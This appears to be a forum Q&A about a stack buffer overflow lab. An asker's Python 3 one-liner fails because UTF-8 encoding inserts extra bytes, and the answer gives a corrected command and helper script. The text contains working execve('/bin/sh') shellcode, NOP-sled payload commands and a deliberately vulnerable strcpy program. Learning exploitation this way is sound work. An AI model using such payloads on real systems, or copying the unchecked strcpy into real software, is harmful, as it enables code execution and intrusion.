After finding the EIP offset, I'm trying to feed some shellcode to my program. With the following command
run $(python -c 'print("A"*108 + "BBBB")')
I get the following output:
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
The problem occurs when I try to add my shellcode. When I input
run $(python -c 'print("\x90"*63 + "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "B" * 20)')
I don't get what I expected (the return address overwritten with B's). Instead I get the following:
Program received signal SIGSEGV, Segmentation fault.
0x90c290c2 in ?? ()
It does work when I increase the number of B's to 48 and decrease the number of NOPs to 35, but I don't understand why it doesn't work with more NOPs and fewer B's for the return address. One other thing I don't understand is that I'm not seeing any NOPs on my stack.
(gdb) x/200x $esp
0xffffd2a0: 0x42424242 0x42424242 0x42424242 0x42424242
0xffffd2b0: 0x42424242 0x42424242 0x42424242 0x42424242
0xffffd2c0: 0x42424242 0x42424242 0x00424242 0x00000001
0xffffd2d0: 0xffffd398 0x68e47ce5 0x9e780f0a 0x00000000
0xffffd2e0: 0x00000000 0x00000000 0xffffd3e0 0x0804b519
0xffffd2f0: 0x00000000 0x08049c76 0xffffd3e0 0x0804b52d
0xffffd300: 0x00000000 0x00000000 0x00000000 0x0804968d
0xffffd310: 0x00000040 0x0000000c 0x00000040 0x00000008
0xffffd320: 0x00040000 0x00000040 0x00002000 0x00300000
0xffffd330: 0x00090000 0x00040000 0x00002000 0x00008000
0xffffd340: 0xffffd370 0xffffd3d4 0x00000002 0x00000001
0xffffd350: 0x00000006 0x00000045 0x00000001 0x00300000
0xffffd360: 0x000c0000 0x00000004 0x00000001 0x00000000
0xffffd370: 0xffffffff 0x00000000 0x080e3620 0x00000000
0xffffd380: 0x00000000 0x00000000 0xffffd3b0 0x080e3ff4
0xffffd390: 0x00000002 0x00000000 0x00000000 0x08049688
0xffffd3a0: 0x00000000 0x00000000 0x00000000 0x08049688
0xffffd3b0: 0x0804968d 0x00000002 0xffffd3d4 0x00000000
0xffffd3c0: 0x00000000 0x00000000 0xffffd3cc 0x00000000
0xffffd3d0: 0x00000002 0xffffd5d2 0xffffd609 0x00000000
0xffffd3e0: 0xffffd6a5 0xffffd6b5 0xffffd6c9 0xffffd6ff
0xffffd3f0: 0xffffd70c 0xffffd746 0xffffd773 0xffffd78a
0xffffd400: 0xffffd79e 0xffffd7d1 0xffffd80f 0xffffd826
0xffffd410: 0xffffd83e 0xffffd881 0xffffd891 0xffffd89d
0xffffd420: 0xffffd8bd 0xffffd8cc 0xffffd8ff 0xffffd90a
0xffffd430: 0xffffd925 0xffffd93a 0xffffd94f 0xffffd95e
0xffffd440: 0xffffd97e 0xffffd9ac 0xffffd9bb 0xffffd9c4
0xffffd450: 0xffffda14 0xffffda22 0xffffda33 0xffffda48
0xffffd460: 0xffffda60 0xffffda6c 0xffffdaf0 0xffffdb01
0xffffd470: 0xffffdb35 0xffffdb64 0xffffdbb0 0xffffdbbf
0xffffd480: 0xffffdbd4 0xffffdbeb 0xffffdc09 0xffffdc1d
0xffffd490: 0xffffdc25 0xffffdc3b 0xffffdc6d 0xffffdc78
0xffffd4a0: 0xffffdc80 0xffffdc99 0xffffdcb4 0xffffdcbf
0xffffd4b0: 0xffffdcd0 0xffffdcef 0xffffdd21 0xffffdd35
0xffffd4c0: 0xffffdd53 0xffffdd6a 0xffffdd83 0xffffdda1
0xffffd4d0: 0xffffde16 0xffffde2c 0xffffde3c 0xffffdf08
0xffffd4e0: 0xffffdf1a 0xffffdf50 0xffffdf6c 0xffffdf84
0xffffd4f0: 0xffffdf9b 0x00000000 0x00000020 0xf7ffc570
0xffffd500: 0x00000021 0xf7ffc000 0x00000033 0x000006f0
0xffffd510: 0x00000010 0xbfebfbff 0x00000006 0x00001000
0xffffd520: 0x00000011 0x00000064 0x00000003 0x08048034
0xffffd530: 0x00000004 0x00000020 0x00000005 0x00000009
0xffffd540: 0x00000007 0x00000000 0x00000008 0x00000000
0xffffd550: 0x00000009 0x08049660 0x0000000b 0x000003e8
0xffffd560: 0x0000000c 0x000003e8 0x0000000d 0x000003e8
0xffffd570: 0x0000000e 0x000003e8 0x00000017 0x00000000
0xffffd580: 0x00000019 0xffffd5bb 0x0000001a 0x00000002
0xffffd590: 0x0000001f 0xffffdfc1 0x0000000f 0xffffd5cb
0xffffd5a0: 0x0000001b 0x0000001c 0x0000001c 0x00000020
0xffffd5b0: 0x00000000 0x00000000 0x62000000 0x9e72e32a
I'm using Python 3. The shellcode is 25 bytes long. I have already disabled ASLR. This is my C code:
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv){
    char buffer[100];
    strcpy(buffer, argv[1]);
    return 0;
}
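In Python 3, string literals "..." are Unicode text, and print encodes them with the output encoding (usually UTF-8) rather than emitting one byte per character the way Latin-1 (ISO-8859-1) would. As a result, every character >= 0x80 is written as two bytes, and the extra bytes render your shellcode unusable.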
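To illustrate the encoding difference, here is a minimal sketch that encodes the same characters as UTF-8 and as Latin-1. The helper name `encoded_forms` is made up for this example, and it assumes the terminal's output encoding is UTF-8.

```python
def encoded_forms(ch):
    """Return (UTF-8 bytes, Latin-1 bytes) for a single character."""
    return ch.encode("utf-8"), ch.encode("latin-1")

# "A" is below 0x80; "\x90" (the NOP byte) is not.
for ch in ("A", "\x90"):
    utf8, latin1 = encoded_forms(ch)
    print(hex(ord(ch)), utf8.hex(), latin1.hex())
# prints:
# 0x41 41 41
# 0x90 c290 90
```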
Try running your Python command like this:
python -c 'print("\x90"*63 + "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "B" * 20)' | hexdump -C
Piping the output through hexdump makes the issue more obvious. The output will look something like:
00000000 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 |................|
*
00000070 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 c3 ab |................|
00000080 0b 5b 31 c3 80 31 c3 89 31 c3 92 c2 b0 0b c3 8d |.[1..1..1.......|
00000090 c2 80 c3 a8 c3 b0 c3 bf c3 bf c3 bf 2f 62 69 6e |............/bin|
000000a0 2f 73 68 42 42 42 42 42 42 42 42 42 42 42 42 42 |/shBBBBBBBBBBBBB|
000000b0 42 42 42 42 42 42 42 0a |BBBBBBB.|
000000b8
You'll notice that the bytes C2 and C3 have been inserted into your code for every character that is >= 0x80 (for example, 0xeb is output as c3 ab). As a result the output is no longer suitable as shellcode.
If you switch to Python 2 the problem resolves itself, since its "..." literals are byte strings and print writes them out unchanged. In Python 3, use byte string literals b'...' and sys.stdout.buffer.write to output the raw bytes to standard output. (sys.stdout.buffer does not exist in Python 2; there, plain sys.stdout.write does the same job.)
A command like this should work in GDB:
run $(python -c "import sys; sys.stdout.buffer.write(b'\x90'*63 + b'\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + b'B' * 20)")
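For longer payloads it can be easier to build the bytes in a small script than in a one-liner. This is only a sketch: `build_payload` and its parameters are hypothetical names, and the default sizes simply mirror the command above.

```python
shellcode = (b"\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"
             b"\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68")

def build_payload(nops=63, padding=20):
    """Hypothetical helper: NOP sled + shellcode + filler, all as raw bytes."""
    return b"\x90" * nops + shellcode + b"B" * padding

payload = build_payload()
print(len(payload))       # 108
print(payload[:4].hex())  # 90909090
```

Because everything is a bytes object, no encoding step is involved, and sys.stdout.buffer.write(payload) would emit it unchanged under Python 3. Going by the "A"*108 + "BBBB" test in the question, a payload of 108 bytes ends right where the saved return address begins, so the B padding may need to be longer for it to reach EIP.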